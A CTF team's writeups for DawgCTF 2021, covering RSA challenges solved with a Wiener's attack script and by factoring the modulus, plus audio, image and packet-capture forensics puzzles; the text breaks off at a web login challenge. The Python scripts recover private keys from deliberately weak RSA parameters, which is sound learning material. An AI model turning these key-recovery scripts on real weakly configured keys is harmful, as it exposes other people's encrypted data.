DawgCTF 2021 Writeups
Howdy, We recently participated in DawgCTF 2021 and we got 41st from 595 teams that got 5 points and above,
here are some of my writeups and those of some of my teammates. Enjoy
Crypto
Really Secure Algorithm
Points : 150
Challenge Description
I like my e’s like I like my trucks: big and obnoxious
Author: trashcanna
Solution
we are given the following values
1n: 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
2e: 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
3c: 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
which is vulnerable to wiener attack and we can use this script to uncipher one encryped flag
1"""
2MxRy - 2016 - Wiener's attack
3useful link : http://math.unice.fr/~walter/L1_Arith/cours2.pdf
4"""
5## get the exploit on https://raw.githubusercontent.com/MxRy/rsa-attacks/master/wiener-attack.py
6import math
7
8def DevContinuedFraction(num, denum) :
9 partialQuotients = []
10 divisionRests = []
11 for i in range(int(math.log(denum, 2)/1)) :
12 divisionRests = num % denum
13 partialQuotients.append(num / denum)
14 num = denum
15 denum = divisionRests
16 if denum == 0 :
17 break
18 return partialQuotients
19
20""" (cf. useful link p.2) Theorem :
21p_-2 = 0 p_-1 = 1 p_n = a_n.p_n-1 + p_n-2
22q_-2 = 1 q_-1 = 0 q_n = a_n.q_n-1 + q_n-2
23"""
24def DivergentsComputation(partialQuotients) :
25 (p1, p2, q1, q2) = (1, 0, 0, 1)
26 convergentsList = []
27 for q in partialQuotients :
28 pn = q * p1 + p2
29 qn = q * q1 + q2
30 convergentsList.append([pn, qn])
31 p2 = p1
32 q2 = q1
33 p1 = pn
34 q1 = qn
35 return convergentsList
36
37"""
38https://dzone.com/articles/cryptographic-functions-python
39Be careful to physical attacks see sections below
40"""
41def SquareAndMultiply(base,exponent,modulus):
42 binaryExponent = []
43 while exponent != 0:
44 binaryExponent.append(exponent%2)
45 exponent = exponent/2
46 result = 1
47 binaryExponent.reverse()
48 for i in binaryExponent:
49 if i == 0:
50 result = (result*result) % modulus
51 else:
52 result = (result*result*base) % modulus
53 return result
54
55def WienerAttack(e, N, C) :
56 testStr = 42
57 C = SquareAndMultiply(testStr, e, N)
58 for c in DivergentsComputation(DevContinuedFraction(e, N)) :
59 if SquareAndMultiply(C, c[1], N) == testStr :
60 FullReverse(N, e, c)
61 return c[1]
62 return -1
63
64"""
65Credit for int2Text :
66https://jhafranco.com/2012/01/29/rsa-implementation-in-python/
67"""
68def GetTheFlag(C, N, d) :
69 p = pow(C, d, N)
70 print p
71 size = len("{:02x}".format(p)) // 2
72 print "Flag = "+"".join([chr((p >> j) & 0xff) for j in reversed(range(0, size << 3, 8))])
73
74"""
75http://stackoverflow.com/questions/356090/how-to-compute-the-nth-root-of-a-very-big-integer
76"""
77def find_invpow(x,n):
78 high = 1
79 while high ** n < x:
80 high *= 2
81 low = high/2
82 while low < high:
83 mid = (low + high) // 2
84 if low < mid and mid**n < x:
85 low = mid
86 elif high > mid and mid**n > x:
87 high = mid
88 else:
89 return mid
90 return mid + 1
91
92"""
93On reprend la demo on cherche (p, q), avec la recherche des racines du P
94de scd degre : x^2 - (N - phi(N) + 1)x + N
95"""
96def FullReverse(N, e, c) :
97 phi = (e*c[1]-1)//c[0]
98 a = 1
99 b = -(N-phi+1)
100 c = N
101 delta =b*b - 4*a*c
102 if delta > 0 :
103 x1 = (-b + find_invpow((b*b - 4*a*c), 2))/(2*a)
104 x2 = (-b - find_invpow((b*b - 4*a*c), 2))/(2*a)
105 if x1*x2 == N :
106 print "p = "+str(x1)
107 print "q = "+str(x2)
108 else :
109 print "** Error **"
110 else :
111 print "** ERROR : (p, q)**"
112
113"""
114Si N, e, C en hex ::> int("0x0123456789ABCDEF".strip("0x"), 16)
115"""
116if __name__ == "__main__":
117 C = 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
118 e = 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
119 N = 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
120 print "e : "+str(e)
121 print "N : "+str(N)
122 print "C : "+str(C)
123 d = WienerAttack(e, N, C)
124 if d != -1 :
125 print "d = "+str(d)
126 GetTheFlag(C, N, d)
127 else :
128 print "** ERROR : Wiener's attack Impossible**"
we did edit the values of C,E,N to that of the challenge in question. running the script gives us the flag
1┌─[✗]─[user@parrot]─[~/Downloads/CTFS/Writeups]
2└──╼ $python2 wiener-attack.py
3e : 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
4N : 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
5C : 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
6** ERROR : (p, q)**
7d = 69767
828130199971861643353837435624382872621577661176756651036349642109
9Flag = DawgCTF{sm@ll_d_b1g_dr3am5}
Flag : DawgCTF{sm@ll_d_b1g_dr3am5}
The Obligatory RSA Challenge
Points 200
Description
Would you believe last year someone complained because we didn’t have any RSA challenges?
Author: trashcanna
Solution
yet another rsa challenge,
1n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
2e = 65537
3c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
given n,e,c we can use factordb.com to factor n,
to which we get the value of p
wrote a simple python exploit
1from Crypto.Util.number import inverse
2import binascii
3
4n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
5e = 65537
6c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
7p = 21816257788879800226266741950501282709401872894176288619472731956291218914324742537604641219560786978413613510633536886641581153942571579359519401327796021367732695476711467566761398025402445133259848384123905962932802004021079944067083532491720877926448099933753336517689984808846750048960375488528766110009254176926887611598941876012437215971816681184483796662759984833863168641346915636162467824574775331116852844756225674938392321848711476249893809700776552828990831593983374320915711192051109410295925205263499219444742867868898381959251178728127024835656647566724333855154762699836449704050690295585931350731821
8
9phi = pow(p,2) - p
10d = inverse(e,phi)
11m = pow(c,d,n)
12print(bytes.fromhex(hex(m)[2:]))
running it we get our flag
1┌─[user@parrot]─[~/Desktop/CTFs/DawgCTF]
2└──╼ $python rsanot.py
3b'DawgCTF{wh0_n33ds_Q_@nyw@y}'
Flag : DawgCTF{wh0_n33ds_Q_@nyw@y}
Audio/Radio
Third Eye
points 75
Description
This beat is making me see things that I didn’t think I could see…
Author: Noodle
Solution
opening the audio in Sonic Visualizer and adding a spectrogram we can see some numbers, zooming out they become clear. extracted the readable numbers,converted from hex. and we get our flag
hex : 44 61 77 67 43 54 46 7b 73 79 6e 33 73 74 68 33 73 31 61 63 73 7d
Flag : DawgCTF{syn3sth3s1acs}
Tag, You’re It!
points 100
Description
Keeping your music library labeled and organized is like a full time job sometimes.
Author: Noodle
Solution
the flag was hidden in the audio metadata as a comment, we can extract that using exiftool
1┌─[✗]─[skoki@parrot]─[~/Desktop/CTFs/DawgCTF]
2└──╼ $exiftool retaliate.mp3
3ExifTool Version Number : 11.16
4File Name : retaliate.mp3
5Directory : .
6File Size : 2.8 MB
7File Modification Date/Time : 2021:05:08 17:12:10+00:00
8File Access Date/Time : 2021:05:08 17:16:36+00:00
9File Inode Change Date/Time : 2021:05:08 17:16:02+00:00
10File Permissions : rw-r--r--
11File Type : MP3
12File Type Extension : mp3
13MIME Type : audio/mpeg
14MPEG Audio Version : 1
15Audio Layer : 3
16Audio Bitrate : 128 kbps
17Sample Rate : 44100
18Channel Mode : Joint Stereo
19MS Stereo : On
20Intensity Stereo : Off
21Copyright Flag : False
22Original Media : True
23Emphasis : None
24Encoder : LAME3.99r
25Lame VBR Quality : 4
26Lame Quality : 3
27Lame Method : CBR
28Lame Low Pass Filter : 17 kHz
29Lame Bitrate : 128 kbps
30Lame Stereo Mode : Joint Stereo
31ID3 Size : 19325
32Picture Format : JPG
33Picture Type : Other
34Picture Description :
35Picture : (Binary data 9063 bytes, use -b option to extract)
36Title : RETALIATE
37Artist : Sam Gellaitry, Connor Pearson
38Band : Sam Gellaitry, Connor Pearson
39Composer : Sam Gellaitry
40Album : RETALIATE (single)
41Track : 1/1
42Part Of Set : 1/1
43Year : 2015
44Beats Per Minute : 120
45Genre : Unclassifiable
46Lyrics : [Verse 1].I don't know what's going on.I'm feeling weak, but I feel so strong.And I won't fight, and I won't run.Don't need a knife, I need a gun.[Bridge].Don't need a knife, I need a gun.[Chorus].Retaliate, retaliate.Retaliate, retaliate.Retaliate, retaliate.[Syllabic improvisation].[Outro].Retaliate.Retaliate.Retaliate.[Syllabic improvisation].[DogeCTF{wr0te_0ut_th3s3_1yrics_by_hand_1ma0}]
47Comment : Ḑ̶͙̀á̴̡̳͈̏ẃ̸͇͚g̸̭̣̱͂C̵̹̆̂Ṱ̴̡͍̀F̴̻͚͐̿̄{̴̟̃̀̐w̵̺̻͒̔͋h̴̭͛0̵͍̤͒͆͝_̷̟̈́͘̚d̶͙͕͜͝0̶͕͚͎̏̚w̸̦͙̃̽ǹ̷͙͚l̶̛̜̈́0̴̧̱͓͝a̶̘̮͚̿̈́ď̷̡̬́ŝ̴̢͔̌͝ͅ_̶̬̺͛̎̈́ͅm̵̳͗ű̶͎̊s̷̰̀̄͆1̸͕͖̈́c̶͔͆_̷̢̧̔̉̚â̵̙̔ǹ̵̖̦͈̇̿ỵ̴̬̓̔m̸̛͉̩̑0̸̮͓̏̊̀r̴͇͕̈́̄̉3̶̙̭͎͋̚͝?̴͔̟̩͊͛}̴̤̲͂͜
48Date/Time Original : 2015
49Duration : 0:03:04 (approx)
Flag : DawgCTF{wh0_d0wnl0ads_mus1c_anym0re?}
Deserted Island Toolkit
points 150
Description
What would a drunken sailor do? (Wrap the output in DawgCTF{ })
Author: Eyeclept
Solution
we get a dawgTunes.iso which we can unzip,
17z x dawgTunes.iso
giving us two files
a dawgTunes.cdda and a checksum
from here we get to know that cdda files are audio files that that store audio in the AIFF format…
this file is however unreecognized by running file at it … so it’s not readable…
since it’s an audio file we can convert it to a more uncompressed format ‘.wav’ using sox
1sox dawgTunes.cdda dawgTunes.wav
listening we can guess that it’s morse code
decoded it using https://morsecode.world/international/decoder/audio-decoder-adaptive.html
after decoding we make some corrections and we get the flag
Flag : DawgCTF{SISNOTTHEAN5W3R}
Moses
points 175
Descriptio
If you can find a way to part the waves, you might find something on the seafloor.
Author: Noodle
Solution
we are given two .flac audio files,
running diff says they are different files.. despite having similar properties
so again i opened up the files in sonic visualizer,
exported the image spectrograms for each audio.
and
almost identical…
used stegsolve’s image combiner,navigating through we get the flag
Flag : DawgCTF{sunk3n_tr3asur3s}
FWN(Forensics/Web/Network)
Just A Comment
points 50
Description
Just a comment, we love our people here at ClearEdge!
Author: Clearedge
Solution
running strings on the file reveals the flag,
1┌─[✗]─[user@parrot]─[~/Desktop/CTFs/DawgCTF]
2└──╼ $strings justacomment.pcapng | grep DawgCTF
3DawgCTF{w3 h34r7 0ur 1r4d 734m}
an alternative would include using Wireshark on an equivalent
Flag : DawgCTF{w3 h34r7 0ur 1r4d 734m}
These Ladies Paved Your Way
points 150
Description
Per womenintech.co.uk, these 10 women paved your way as technologists. One of them holds more than 100 issued patents and is known for writing understandable textbooks about network security protocols. What other secrets does she hold?
Author: Clearedge
Solution
we get 10 images.
running exiftool reveals an interesting find on radia_perlman.jpg
1ExifTool Version Number : 11.16
2File Name : radia_perlman.jpg
3Directory : .
4File Size : 10 kB
5File Modification Date/Time : 2021:04:23 23:11:46+00:00
6File Access Date/Time : 2021:05:10 11:10:32+00:00
7File Inode Change Date/Time : 2021:05:10 11:10:20+00:00
8File Permissions : rw-r--r--
9File Type : JPEG
10File Type Extension : jpg
11MIME Type : image/jpeg
12JFIF Version : 1.01
13Resolution Unit : None
14X Resolution : 1
15Y Resolution : 1
16Current IPTC Digest : 8d370a1f7871e76616c0f06987707b84
17Credit : U3Bhbm5pbmdUcmVlVmlnCg==
18Application Record Version : 4
19Keywords : VpwtPBS{r0m5 0W t4x3IB5}
20Comment : CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 80.
21Image Width : 227
22Image Height : 244
23Encoding Process : Baseline DCT, Huffman coding
24Bits Per Sample : 8
25Color Components : 3
26Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
27Image Size : 227x244
28Megapixels : 0.055
decoding U3Bhbm5pbmdUcmVlVmlnCg== gives us SpanningTreeVig
which is they key to the vigenere cipher VpwtPBS{r0m5 0W t4x3IB5}
Flag : DawgCTF{l0t5 0F p4t3NT5}
Dr. Hrabowski’s Great Adventure
points 150
Description
President Freeman Hrabowski is having a relaxing evening in Downtown Baltimore. But he forgot his password to give all UMBC students an A in all their classes this semester! Find a way to log in and help him out.
(If you get an SSL error, try a different browser)
Author: Clearedge
Solution
